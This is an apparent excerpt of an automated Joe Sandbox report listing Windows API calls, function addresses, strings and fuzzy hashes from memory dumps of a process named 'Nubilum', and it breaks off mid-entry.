                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: File$ErrorLastLockUnlockmemset
                          • String ID:
                          • API String ID: 3727323765-0
                          • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                          • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                          • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                          • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                          APIs
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                          • malloc.MSVCRT ref: 00417407
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                          • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$??3@malloc
                          • String ID:
                          • API String ID: 4284152360-0
                          • Opcode ID: 83a2f8aa6e63983656d4fab6a303ce5997479b3bf05a742e9efdfe729434c34a
                          • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                          • Opcode Fuzzy Hash: 83a2f8aa6e63983656d4fab6a303ce5997479b3bf05a742e9efdfe729434c34a
                          • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                          APIs
                          • memset.MSVCRT ref: 0040F673
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                          • strlen.MSVCRT ref: 0040F6A2
                          • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                          • String ID:
                          • API String ID: 2754987064-0
                          • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                          • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                          • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                          • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                          APIs
                          • memset.MSVCRT ref: 0040F6E2
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                          • strlen.MSVCRT ref: 0040F70D
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                          • String ID:
                          • API String ID: 2754987064-0
                          • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                          • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                          • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                          • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                          APIs
                          • memset.MSVCRT ref: 00402FD7
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                          • strlen.MSVCRT ref: 00403006
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                          • String ID:
                          • API String ID: 2754987064-0
                          • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                          • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                          • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                          • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                          APIs
                            • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                            • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                            • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                          • SetBkMode.GDI32(?,00000001), ref: 004143A2
                          • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                          • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                          • GetStockObject.GDI32(00000000), ref: 004143C6
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                          • String ID:
                          • API String ID: 764393265-0
                          • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                          • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                          • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                          • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                          APIs
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                          • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Time$System$File$LocalSpecific
                          • String ID:
                          • API String ID: 979780441-0
                          • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                          • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                          • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                          • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                          APIs
                          • memcpy.MSVCRT ref: 004134E0
                          • memcpy.MSVCRT ref: 004134F2
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                          • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpy$DialogHandleModuleParam
                          • String ID:
                          • API String ID: 1386444988-0
                          • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                          • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                          • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                          • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                          APIs
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                          • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                          • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                          • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                          APIs
                          • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                          • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: InvalidateMessageRectSend
                          • String ID: d=E
                          • API String ID: 909852535-3703654223
                          • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                          • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                          • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                          • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                          APIs
                          • wcschr.MSVCRT ref: 0040F79E
                          • wcschr.MSVCRT ref: 0040F7AC
                            • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                            • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: wcschr$memcpywcslen
                          • String ID: "
                          • API String ID: 1983396471-123907689
                          • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                          • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                          • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                          • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                          APIs
                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                          • _memicmp.MSVCRT ref: 0040C00D
                          • memcpy.MSVCRT ref: 0040C024
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: FilePointer_memicmpmemcpy
                          • String ID: URL
                          • API String ID: 2108176848-3574463123
                          • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                          • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                          • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                          • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _snwprintfmemcpy
                          • String ID: %2.2X
                          • API String ID: 2789212964-323797159
                          • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                          • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                          • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                          • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _snwprintf
                          • String ID: %%-%d.%ds
                          • API String ID: 3988819677-2008345750
                          • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                          • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                          • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                          • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                          APIs
                          • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                          • memset.MSVCRT ref: 00401917
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: PlacementWindowmemset
                          • String ID: WinPos
                          • API String ID: 4036792311-2823255486
                          • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                          • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                          • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                          • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                          APIs
                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                          • wcsrchr.MSVCRT ref: 0040DCE9
                          • wcscat.MSVCRT ref: 0040DCFF
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: FileModuleNamewcscatwcsrchr
                          • String ID: _lng.ini
                          • API String ID: 383090722-1948609170
                          • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                          • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                          • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                          • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                          APIs
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                          • String ID: SHGetSpecialFolderPathW$shell32.dll
                          • API String ID: 2773794195-880857682
                          • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                          • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                          • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                          • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                          APIs
                          • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                          • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: LongWindow
                          • String ID: MZ@
                          • API String ID: 1378638983-2978689999
                          • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                          • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                          • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                          • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                          APIs
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpy$memset
                          • String ID:
                          • API String ID: 438689982-0
                          • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                          • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                          • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                          • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                          APIs
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??2@$memset
                          • String ID:
                          • API String ID: 1860491036-0
                          • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                          • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                          • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                          • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                          APIs
                          • memcmp.MSVCRT ref: 00408AF3
                            • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                            • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                            • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                          • memcmp.MSVCRT ref: 00408B2B
                          • memcmp.MSVCRT ref: 00408B5C
                          • memcpy.MSVCRT ref: 00408B79
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcmp$memcpy
                          • String ID:
                          • API String ID: 231171946-0
                          • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                          • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                          • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                          • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                          APIs
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
